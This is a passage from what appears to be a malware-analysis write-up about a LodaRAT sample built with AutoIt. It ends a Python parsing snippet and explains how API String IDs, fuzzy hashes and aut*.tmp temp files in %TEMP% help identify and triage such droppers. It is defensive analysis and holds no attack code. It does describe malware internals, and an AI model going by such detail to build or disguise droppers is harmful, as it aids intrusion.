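        print(f"{fp}: {len(hashes)} function(s)")
    print("GetTempFileNameW:", find_calls(recs, "GetTempFileNameW"))
```

Two things fall out of the parsed data. The two SendMessageW entries share one API String ID even though their opcode and instruction fuzzy hashes differ, which is exactly the coarse key the Similarity block is built to match across samples, while the fuzzy hashes separate the individual variants. And the direct-call filter surfaces the GetTempFileNameW call with the "aut" prefix, the temp-file naming the AutoIt runtime uses (the "AutoIt" MessageBoxW caption above confirms this is an AutoIt-compiled binary), which is why aut*.tmp files in %TEMP% are a routine triage pivot for AutoIt-based droppers such as this LodaRAT sample.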